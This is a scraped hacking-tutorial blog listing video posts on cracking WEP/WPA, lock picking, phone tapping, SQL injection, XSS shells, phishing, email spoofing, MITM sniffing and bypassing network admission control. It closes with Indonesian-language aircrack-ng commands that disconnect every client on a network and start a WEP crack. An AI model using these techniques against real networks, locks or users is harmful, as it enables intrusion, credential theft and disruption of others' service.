The second episode of Full Disclosure is now released. This episode includes how to crack WEP encryption, and why it is so easy to crack. The shownote are published in the wireless hacking section of the forums.
Download video here
Wireless Hacking - Cracking WEP
Friday, December 5, 2008
·
0
comments
Wireless Hacking - DeAuth
The third episode of Full Disclosure is a short one; however, it is a necessary step in cracking WPA-PSK which will be our next video. Basically this attack just disconnects all the users on a wireless network. The attacker does not need to know the WEP or WPA key or be connect to the network. This attack is illegal in many states, so this video is for education reasons only.
Download video here
Lock Picking - Bump Key
·
1 comments
Labels:
Lock Picking
This is the first of our Lock picking series. In this episode we describe how to make and use a bump key to quickly unlock most residential grade locks.
Download video here (Right Click -> Save Link as)
Video Shownotes here
Read More......
Phone Phreaking - Beige Box
·
0
comments
Labels:
Phone Phreaking
This episode of Full Disclosure we are demonstrating how to tap a phone line with the old school Beige Box! We are planning to have many Phone Phreaking (telephone hacking) episodes like Sniffing VOIP, Hacking COCOT, and Red Boxing to name a few.
Download video here (Right Click -> Save Link as)
Read More......
Phone Phreaking/Network Hacking - Sniffing VoIP
·
0
comments
Labels:
Sniffing VoIP
Our seventh episode is a mix between Phone Phreaking and Network Hacking. In this episode we demonstrate how to sniff Voice Over IP conversations, which basically means how to tap an internet phone. We thought that this would be a good video to follow the beige box.
Download video here (Rig
Lock Picking - DIY Padlock Shims
·
0
comments
Labels:
Lock Picking
This is our second video in our Lock picking series. In this video we explain how to make and use Padlock Shims. Padlock Shims are used to unlock spring latch Padlocks.
Read More......
Lock Picking - Mult-Disc Combo Locks
·
0
comments
Labels:
Lock Picking
This is our third video in our Lock Picking series; after this video we will return to computer hacking videos for a while. In this video we demonstrate how to unlock the Master Lock 653D, Targus Defcon CL, and the Master Lock 175. The different methods shown in this video to unlock these three locks will help you not only unlock these locks; but also, help you develop your own way to crack other mult-disc combo locks that you may come across.
Read More......
Local Privilege Escalation Vulnerability in Cisco VPN Client
Recently a local privilege escalation vulnerability was found in Cisco’s VPN Client. When Cisco VPN Client is installed, a windows service “Cisco Systems, Inc. VPN Service” is created. The service runs the binary C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe as Local System. Therefore, if you replace cvpnd.exe with another executable, then that program will be ran at startup with root privileges! I fond this vulnerability interesting because it is used at my college to authenticate students when they connect to the wireless network. For that reason, almost every student with a laptop has this software installed, and students are allowed to borrow school laptops from the student center to use the wireless internet. Consequently, anyone could borrow a laptop, gain root access thought the vulnerability, and install a keylogger that sends every keystroke to the attacker’s email! Its been 5 days seen this vulnerability was discovered, and Cisco has already issued a patched version. However, how long will it take for the school to update all their computers? This is just another reason why you should be careful when using school computers!
Video Demonstration: (shows how to gain root access and change the Admin password with this vulnerability)
Hacking Basics - MD5
·
0
comments
Labels:
Hacking Basics
In this episode of Full Disclosure we will demonstrate how to crack MD5 password hashes. MD5 (Message-Digest algorithm 5) is a hash function commonly used by websites to encrypt passwords. MD5 is a one-way hash; therefore, to crack the password you most try every possible dictionary word and if that does not work, every possible letter/number/symbol combination. The programs we use to crack the passwords are Cain and MDCrack-NG.
Download video here (Right Click -> Save Link as)
Read More......
Website Hacking - Sql Injection
·
0
comments
Labels:
Sql Injection,
Website Hacking
For Infinity Exists Full Disclosure’s first Website Hacking episode, we demonstrate how to exploit a security vulnerability occurring in a website’s database to extract password hashes. Sql (Structured Query Language) is a computer language designed for the retrieval and management of data in a system’s database. The Attack, known as Sql Injection, manipulates Sql statements before they are sent to the Sql Server, allowing the Attacker to create, change, or retrieve data stored in the database. Sql Injection is a hard concept to understand, so we made a video that encompasses all our knowledge on the subject to make it easier for our viewers to grasp.
Download video here (Right Click -> Save Link as)
Read More......
Hacking Basics - Backtrack
On the forums, there has been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many as these question as possible. In this episode we cover: Where to get Backtrack 2, How to burn an .ISO file, How to boot Backtrack 2, How to login, and start the GUI interface. Also, we illustrate basic Linux commands, and how to set up your Network Interfaces.
Download video here (Right Click -> Save Link as)
Read More......
How to use Intel Pro/Wireless 3945ABG in Backtrack 2
·
0
comments
Labels:
Wireless 3945ABG
The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is build-in many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW Drivers. After the drivers are installed your wireless card will be lock in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 Drivers.
Video DemonstrationDownload IPWRAW Module Here
Discuss Here
Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius
Read More......
How to use Intel Pro/Wireless 3945ABG in Backtrack 2
·
0
comments
Labels:
Wireless 3945ABG
The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is build-in many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW Drivers. After the drivers are installed your wireless card will be lock in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 Drivers.
Video DemonstrationDownload IPWRAW Module Here
Discuss Here
Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius
Read More......
Sql Injection Challenge!
·
0
comments
Labels:
Sql Injection
I’m proud to announce the first Infinity Exists’ Hacking Challenge! The challenge is to find a Sql Injection flaw in our forums, and exploit it to extract password hashes. The first person to complete this challenge will receive a free Infinity Exists T-shirt. The Sql Injection vulnerability is hidden deep in Infinity Exists’ forums, and will be much harder to find then the vulnerability demonstrated in Full Disclosure Episode 11. Tips to help you get started:
- Watch Full Disclosure Episode 11!
- Download Wp-Forums Source Code
- The variable that is used to manipulate the Sql Statement is a POST variable.
—————————————————————————————————————————–
Update!
marcel.romard and esc both won Infinity Exists’ Sql Injection Challenge!! Marcel.romard found the Sql injection flaw in the forum’s search that this challenge was based around. Esc found a Sql Injection flaw that we were unaware of in the forum’s RSS feed. Congrats to both of you!
Read More......
Sql Injection Challenge How-to
·
0
comments
Labels:
Sql Injection
The Sql Injection Challenge has already been completed, so here is a video demonstration on how to find this Sql Injection flaw and exploited it to extract password hashes. In this video I use a firefox plugin ‘Data Tamper’ that can be download here
Full Size Video
Download Here
Read More......
SIUC’s Network
·
0
comments
Labels:
SIUC’s Network
I currently attend Southern Illinois University at Carbondale, and I am taking Digital Circuit Design with Dr. Weng who also teaches Network Processing Systems Design. Today in class he invited all his students to go a tour of SIUC’s computer network with his Network Processing Systems class. Of course I took up his often because it is not every day a regular student can walk into the core networking room and server mainframe of a large University. Basically, the network is system up on a three layer infrastructure (Core Layer, Distribution Layer, Access Layer). At the Access Layer (which is the layer that provides network access to client computers) the University uses Cisco Catalyst 2950 switches. Those switches are connected via cross-over cable to the Distribution Switch which is a Cisco Catalyst 3524. In turn, the Distribution switch connects via fiber wire to the Core Switch which is a Cisco Catalyst 6509. The entire can network runs at 1 Gigabyte; however, the internet bandwidth is capped at 300 Mb! Furthermore, only 90 Mb of bandwidth is dedicated to the Residence Halls!! All the Core Switches goto the student center where the internet point of entry is located. Also, internet traffic is filtered through a SourceFire firewall. Some more interesting networking facts: SIUC has 9 Wireless AP (I believe) which are managed by a Cisco Wireless LAN Controller, for access control they use Cisco 1111, for VPN they use Cisco VPN Concentrator 3000, and for their servers they use Sun System SunFire. A interesting security fact is that they only use SSH to configure switches remotely because the web interface has security issues. Lastly, you probably noticed that most of their networking devices are Cisco this is for compatibility reasons, they had problems in the past for using multiple vendors. Well thats about it, hope you enjoyed hearing about SIUC’s Network.
Typical Network Layout of a SIUC Building: 
My Dorm’s Network Layout: 
Infinity Exists Featured On 60 Minutes
CBS’s 60 Minutes ran a segment on internet insecurities and they showed the ease of finding tutorials on youtube to exploit them. They chose our video on cracking WEP to demonstrate and showed a short clip of it. The segment is up on the CBS website and you can check it out here. Thank you CBS for the free publicity!
—————————————————————————————————————————– Update - Live Stream
Website Hacking - XSS
·
0
comments
Labels:
Website Hacking
In this episode of Full Disclosure we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.
Download video here (Right Click -> Save Link as)
Read More......The 60 Minutes Effect
·
0
comments
Labels:
The 60 Minutes Effect
As most of you already know, Infinity Exists’ Full Disclosure Ep. 2 Wep Cracking was featured on CBS’s 60 Minutes “High-Tech Heist” for about 10 seconds. Those few seconds on Nation Television gave us about 40,000 hits on YouTube, and about 750 unique hits on InfinityExists.com. Weeks after the 60 minutes episode aired Infinity Exists is still getting an average of 300 unique hits a day. This is pretty good compared to our 200 hit average before.
However, 60 Minutes brought Infinity Exists to the attention of a few unwanted people. For Example:
People that do not understand what it is to be a hacker, just simply think we are criminals. A Hacker truly is a computer enthusiast that enjoys exploring various computer systems in the pursuit to gain more knowledge. A hacker’s goal is never to harm anyone or anything as the media would like you to believe. The goal of Infinity Exists’ video series Full Disclosure is to inform people about specific security flaws. If there was no one to disclose this information to the general public then everyone would still being using insecure technology and would be at the mercy of criminal crackers.
Exploit Hacking
·
0
comments
Labels:
backtrack,
Exploit Hacking,
trik,
tutorial,
video
Since Infinity Exists hasn’t had time to release a new episode, I decided to revamp a two part series, Exploit Hacking and Exploit Hacking 2 - Privilege Escalation, that I made a year before Infinity Exists was created. It may be a little dated, but it provides great information on how a hacker can find an vulnerability on a remote computer and exploit it to gain remote access. Also, the video shows how a hacker can raise their privileges on the remote machine to administrator. I added text throughout the video to make it easier to understand. Furthermore, Infinity Exists plans to do a more up-to-date and more detailed series of episodes on “exploit hacking.”
Full Scale Video Here
Download Here
USB Worm (Jamesgo.dll)
·
0
comments
Labels:
USB Worm (Jamesgo.dll)
The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I disclovered that each drive contains the Visual Basic Script, test.vbs (Click Here to view Test.vbs). Basically what the file does is copies test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive in 60 seconds it will recopy itself from a different drive. Futhermore, the test.reg simply edits the registry so test.bat runs on start up and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system,hidden,achieved, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deleted them. Since the batch file can delete all the files quickly it does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entires of test.bat from the registry (Click Here to view Fix)
To prevent a USB Worm from infecting your computer:
1) Goto Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”
In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example on how easy it is to create a Worm for travels though removal media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create a “Auto Hacking USB Thumb Drive” go here.
Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.
Staying Secure - SSH Tunnel
·
0
comments
Labels:
Staying Secure - SSH Tunnel
The wait is finally over! This new episode of Full Disclosure shows you how to use a SSH Tunnel to secure your data when you are on an untrusted LAN (ex. Coffee Shop, School’s network, or Defcon). Furthermore, you can use the SSH Tunnel to bypass the LAN’s internet filters. The SSH tunnel protocol works by encapsulates your data into an encrypted payload and transmitting it to the SSH Server which is setup on a trusted LAN.
Live Stream Here
Download Here
Links:
OpenSSH for Windows, Putty, Proxifier
Wireless Hacking - Cracking WPA
This episode of Full Disclosure illustrates the progress of Cracking weak WPA Preshared Keys. Before you can crack the Preshared Key you must capture the four way handshake between the Access Point and a client; to accomplish this you must force the client to reconnect to the AP with the DeAuthentication attack we showed in episode 3. If you are using the Linksys WUSB54GC you will have to update your drivers to RaLink RT73 USB Enhanced Driver. In this episode we show you how to do this, and I also made a Backtrack module to automate the process. The module works in the same way as the IPWRAW Module for the Intel Pro/Wireless 3945ABG card, so you can watch that Vblog if you are having troubles.
Live Stream Here
Download Here
Download RT73 Module Here
Watch IPWRAW Vblog Here
Singing Tesla Coil
This weekend was UIUC’s annual Engineer Open House, and last night there was a Singing Tesla Coil show. The Tesla coils were built by Steve Ward, a EE student at UIUC. “Steven has developed Tesla Coils with high levels of control allowing audio modulation of their lightning-like display. Interfacing the Continuum Fingerboard with this technology will generate a musically expressive and highly energetic, multi-voiced performace” (EOH Exhibit Guide).
Full Scale Video Here
Download Here
McAfee SiteAdvisor
·
0
comments
Labels:
McAfee
An anonymous viewer brought to my attention that McAfee’s so called “SiteAdvisor” had labeled Infinityexists.com with the big evil red X
It turns out that McAfee SiteAdvisor scanned Infinity Exists and found the Jamesgo.dll Worm, which I uploaded so you guys can see how it works. Not only is the virus zipped to prevent anyone from accidentally running it, but also, there is an explanation on how to remove the virus in the blog post.
(I have to agree with the Nuisance ‘O Meter. Jamesgo is definitely an 8!)
Don’t get my wrong, I think it is a good idea for McAfee to try to inform non-techie computers users that those free screensavers are going to mess up their computer. I just think McAfee should take into account the content of the website instead of just blindly scanning the internet for viruses. Now people interested in computer hacking will be disinclined to visit Infinity Exists because they’ll see this:
Well anyways, that my rant on McAfee SiteAdvisor
Tapping a 66 Block Telephone Network Interface
Awhile ago I was asked to rewiring a company’s 66 Block, a type of punchdown block used to connect sets of wires in a telephone system, because they wanted to replace their plain old telephone service (POTS) with multiple VoIP telephone lines. I had little knowledge on the 66 Block before doing this job, so I got out my trusty Beige Box to figure out how it was wired. Here’s a short video on how to tap a 66 Block. (Watch Episode 6 if you need help making a Beige Box)
Full Scale Video Here
Download Here
Triple Boot - Windows, Backtrack, & Ubuntu
·
0
comments
Labels:
backtrack,
Triple Boot,
ubuntu,
windows
For episode 17, we demonstrate how to triple boot a computer with Windows, Backtrack, and Ubuntu. Nox and I go through the process of setting up the various disk partitions, installing Backtrack and Ubuntu to different partitions, and how to configure your computer to boot between each of the Operating Systems. Hopefully, this episode will give you guys insight on how to go about multibooting your computer with several different OSs.
Live Stream Here
Download Here
Download Backtrack
Download Ubuntu
Dual Boot - Windows & Backtrack
We said we would release a Vblog on how to Dual boot Windows and Backtrack so here it is. The process is slightly different, there is not need for an extended partition because you only need four primary partitions, and we use Lilo for the boot loader. Since we aren’t installing Ubuntu we have to manually create and configure the linux swap partition. Also, we have to manually configure Lilo; however, this allows us to change the Splash image when your computer starts.
Download Here
Read More......
Local Password Cracking
·
0
comments
Labels:
Local Password Cracking
In this addition of Full Disclosure, Nox and I show you how to crack local Linux and Window’s passwords. Furthermore, we explain how to reset and restore Linux or Window’s password for temporary access to a computer. There are different trade-offs for each method of bypassing local passwords. Cracking a password can take a long time, but knowing the password may help you gain access to other computers and programs. Reseting and Restoring a password is quick because you don’t need to know the password, but you will have to repeat this method every time you want access to the computer.
Live Stream Here
Download Here
Ophcrack
Cain
Introduction
·
0
comments
Labels:
Introduction
Infinity Exists Underground is a new video series based completely on viewer submissions. If you have an educational video on hacking, lock picking, modding, etc. send an email explaining what your video is about to underground@infinityexists.com. Nox and I will review the emails and if it sounds like a good informative video we will give you access to the video upload page so you can submit your video. We may edit your video slightly to make it clearer, but you will get credit for creating the video. Also, you can remain anonymous if you are making a questionable video. We hope to get many viewer submissions so that we can get more content on the site and also get you guys more involved.
Full Scale Video Here
Download Here
Lock Picking Basics
·
0
comments
Labels:
Lock Picking Basics
Our 19th video is a continuation of our lock picking series. In this episode, we explain how to pick a deadbolt lock using the Lifter Picking method.
Live Stream here
Download video here
Email Spoofing
·
0
comments
Labels:
Email Spoofing
The first Underground video explains how to send fake emails a.k.a. Email Spoofing. This video, submitted by Crash Overron, covers two methods of email spoofing. The first and older method is connecting directly to the SMTP server with Telnet; however, this method is usually blocked by the email provider. The second method, utilizes the Mail() function in php. Full Scale Video Here
Download Here
Download Email_Spoof.php
(Right Click -> Save As Email_Spoof.php)
Metasploit Autopwn
·
0
comments
Labels:
Metasploit Autopwn
In this Underground Video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3. Full Scale Video Here
Download Here
The Metasploit Project
For more information on the Metasploit Framework check out my Exploit Hacking video.
Recovering an Acer Computer
·
0
comments
Labels:
Recovering an Acer Computer
Last Thursday, my Acer Travelmate laptop crapped out on me and stopped booting Windows XP. I tried everything to fix it: booting into safe mode, using Windows recovery console to fix the boot.ini, fixing the corrupted partition boot sector with Fixboot, and fixing the Master boot record with Fixmdr. I even tried to reinstall windows, but it still wouldn’t boot! So I decided I would just backup all my stuff with a liveCD, format the drive, and use the recovery cd to start all over. Guess what? Acer doesn’t ship their laptops with a Recovery CD; they require you have to burn it yourself when you first get the computer, and of course I was way too lazy to do that. Well after some research I found out there is a hidden recovery partition that the Acer repair people use to fix your computer. If you are having the same problem as me, heres how I accessed the hidden partition and recovered my computer.
1. Boot your computer with the Backtrack liveCD (I used BT2 because it was the only thing I had off hand)
2. Backtrack will automatically mount the hidden drive (sda1). Navigate to it in the /mnt/sda1 folder.
3. Copy mbrwrwin.exe and rtmbr.bin from the /mnt/sda1 folder to the /mnt/sda2 folder (your C drive).
4. Next, you need to run the mbrwrwin install rtmbr.bin command. You can do this a couple different ways: You can use the Windows Recovery Console to run the command, or use a Windows LiveCD like BartPE (http://www.nu2.nu/pebuilder/). I used BartPE because I already tried to re-install windows and I couldn’t access the recovery console because I wasn’t able to set an Administrator password.
5. Restart your computer, and press Alt-F10 at the Acer splash screen. This will bring you to the Acer eRecovery on the hidden partition, and all you have to do is follow the directions to restore the factory settings. (If you can’t access the eRecovery make sure d2d recovery is enabled in BIOS. You can access the BIOS by pressing F2 at the Acer splash screen).
6. After your computer is restored, burn the damn recovery cd so you don’t have to do this next time!!!
For more information check out:
http://forum.notebookreview.com/showthread.php?t=175697
http://forum.notebookreview.com/showthread.php?t=11476
Application Patching
·
0
comments
Labels:
Application Patching
Crash Overron’s second Underground video explains how to use Ollydbg to manipulate a simple program. OllyDbg is a debugger that analyzes binary code. Not only does Olly allow you to step through an executable’s assembly code, but also, it can trace registers, recognize procedures, API calls, switches, tables, constants and strings. Crash Overron utilizes a feature in Olly to locate a referenced text string that is displayed when an invalid serial key is entered. Once the string is located, he can find the compare statement that checks the user’s serial key, and change the flow of the program so that his serial key is accepted. Full Scale Video Here
Download Here
Download Ollydgb
Download Application
Ettercap
·
0
comments
Labels:
Ettercap
For this episode of Full Disclosure, we illustrate the many features of Ettercap. Ettercap is a program designed to sniff passwords on a LAN. It can recognize several different packets that contain passwords including Http, Telnet, Ftp, Pop, Rlogin, SSH1, ICQ, SMB, MySql, NNTP, X11, IRC, IMAP, VNC, SNMP, MSN, YMSG, etc. Furthermore, Ettercap can utilize Man in the Middle Attacks to hijack packets and redirect them to the attacker computer allowing it to extract passwords. In this episode, we show you how to use Arp Poisoning, DHCP Spoofing, and Port Stealing MITM Attacks and explain how they work. Also, we explain how to configure Ettercap to sniff encrypted passwords over the Secure Sock Layer (SSL and HTTPS). Moreover, Ettercap can be easily programmed to modify network traffic with the use of Filters. We demonstrate how to make many different Ettercap Filters. Ettercap comes with numerous plugins to advance Ettercap’s abilities; we explain how to use the Check Poison, Re-Poison, DNS Spoofing, Isolate, DoS Attack, Find IP, Gateway Discover, Search Promisc, Arp Cop, and Scan Poisoners Plugins. Lastly, we demonstrate how to use Ettercap’s Passive OS Fingerprinting feature. Ettercap supports passive dissection of many protocols allowing it to identify a host’s Operating System and Services.
Live Stream Here
Download Here
This Full Disclosure episode is very lengthy, almost 50 minutes, so if you have any questions feel free to ask them on the forums
Download Ettercap (Linux)
Download Ettercap (Windows)
Filters:
Irongeek’s Image Altering Filter
Patchy’s Wordpress Filter
Patchy’s Myspace Filter
Windows SMB Relay Exploit
In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter. Full Scale Video Here
Download Here
Download Ettercap Filter Here
Beer Pong Table
·
0
comments
Labels:
Beer Pong Table,
trik,
tutorial,
video
The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and ” What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well. Full Scale Video Here
Download Here
Pre-Amp Schematic
Beer Pong Table
·
0
comments
Labels:
Beer Pong Table,
trik,
tutorial
The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and ” What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well. Full Scale Video Here
Download Here
Pre-Amp Schematic
XSS Tunnel
·
0
comments
Labels:
XSS Tunnel
XSS Shell is a cross-site scripting backdoor into the victim’s browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim’s browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim’s browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim’s browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s Javascript reference by utilizing a XSS flaw on a website. Once the victim’s browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the Attacker can use a XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim’s browser; in turn, exploiting the victim’s credentials to bypass authentications and IP Restrictions. The XSS Tunnel is a HTTP Proxy that sits on an attacker’s computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.
Live Stream Here
Download Here
Download XSS Shell and Tunnel
Password Phishing
Phishing is a method of obtaining sensitive information such as usernames and passwords by pretending to be a trusted website. Tehdead shows us a variety of password phishing techniques that enable an attacker to trick a user into giving up their login information. The first step is to create a fake login identical to the login on the trusted website. In order to not raise suspicion, Tehdead explains two methods to capture the victim’s password and then transfer them to the real website. One method is to sumbit the information to a php page that is disguised as a pop-up advertisment, and the other is to send the username and password to a simular php page that is contained in an iframe. Lastly, Tehdead describes how to use link manipulation with BBcode to social engineer a victim into going to the fraudulent website. Full Scale Video Here
Download Here
Bypass Cisco Clean Access & Cisco NAC Appliance
Cisco NAC Appliance (formerly Cisco Clean Access) is a Network Admission Control (NAC) product that is uses to enforce security policy on computers seeking to access network resources. Therefore, an administrator can force users to comply to a policy that requires the user to install or remove programs. For example, a university I previously attended required students to install McAfee Antivirus Software and remove Peer-to-Peer programs before they were allowed to access the internet.
To bypass Cisco Clean Access a user can simply change their browser’s User Agent to an Operating System that does not require this program [ex. Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.8) Gecko/20050511]. An easy way to change your User Agent in Firefox is to download User Agent Switcher.
With Cisco NAC Appliance, Cisco added additional detection mechanisms such as TCP fingerprinting and JavaScript OS detection, so the User Agent trick will not work. However, by changing the default parameters of the Windows TCP/IP stack the user can still connect to the network without running any host-based checks. You can do this with Kevin.
Video Demonstration:
Manipulating Windows User Accounts
Xauthzx’s Underground video describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.
User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group
Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders
net use * \\[Computer Name]\[Shared Folder] – Mount Network Shared Folder
Manipulating Windows User Accounts
·
0
comments
Labels:
windows
describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.
User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group
Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders
Episode 12 - Hacking Basics - Backtrack
On the forums, there has been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many as these question as possible. In this episode we cover: Where to get Backtrack 2, How to burn an .ISO file, How to boot Backtrack 2, How to login, and start the GUI interface. Also, we illustrate basic Linux commands, and how to set up your Network Interfaces.
Download video here (Right Click -> Save Link as)
Read More......List of compatible adapters BackTrack
PCMCIA/Cardbus/Express Card
Airlink AWLC4030 Chipset Atheros
Belkin F5D8071 Chipset Atheros
D-Link DWA-643 Chipset Atheros
D-Link DWL-650 Chipset Prism 2.5
D-Link DWL-G630 C2 v3.01 Chipset Atheros
D-Link DWL-G630 E1 Chipset Ralink
D-Link DWL-G650 C3, C4, B5 Chipset Atheros
Linksys WPC55AG v1.2 Chipset Atheros
MSI CB54G2 Chipset Ralink
Netgear WAG511 Chipset Atheros
Netgear WG511T Chipset Atheros
Netgear WG511U Chipset Atheros
Proxim 8470-WD Chipset Atheros
Senao NL-2511 CD PLUS EXT Chipset Prism 2.5
TP-Link TL-WN610G Chipset Atheros
TrendNet TEW-441PC
Ubiquiti SRC Chipset Atheros
PCI/MiniPCI/MiniPCI Express
ASUS WL-138G V2 Chipset Broadcom
ASUS WL-138gE Chipset Broadcom
Canyon CN-WF511 Chipset rt61
D-Link DWL-G550 Chipset Atheros
Linksys WMP54G v4 Chipset Ralink
Linksys WMP54G-UK v4.1 Chipset Ralink
MSI PC54G2 Chipset Ralink
Netgear WG311T Chipset Atheros
Netgear WPN311 Chipset Atheros
Thinkpad 11a/b/g Chipset Atheros
TP-Link TL-WN650G Chipset Atheros
TP-Link TL-WN651G Chipset Atheros
Trendnet TEW-443PI A1 1R Chipset Atheros
USB
Asus WL-167g v2 Chipset Ralink RT73
Airlink AWLL3026 Chipset Zydas zd1211
Alfa AWUS036E Chipset RTL8187L
Alfa AWUS036H Chipset rtl8187
Alfa AWUS036S Chipset Ralink rt73
Digitus DN-7003GS Chipset RTL8187L
D-Link DWL-G122 B1 Chipset Ralink RT2570
D-Link DWL-G122 C1 Chipset Ralink RT73
D-Link WUA-1340 Chipset Ralink RT73
Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73
Linksys WUSB54G v4 Chipset Ralink rt2570
Linksys WUSB54GC Chipset Ralink RT73
Netgear WG111 v1 Chipset PrismGT SoftMAC
Netgear WG111 v2 Chipset RTL8187L
TP-Link TL-WN321G Chipset Ralink RT73
Trendnet TEW-429UB C1 Chipset Zydas zd1211b
ZyXEL AG-225H Chipset Zydas zd1211
ZyXEL G-202 Chipset Zydas zd1211b
Banyak yang menyarankan sebaiknya menggunakan Chipset Atheros, BackTrack bakalan lebih jantan ...
Perintah untuk Hacking Wi Fi (BackTrack)
luthfil:
a. Mematikan seluruh Client
aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0
b. WEP crack
airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
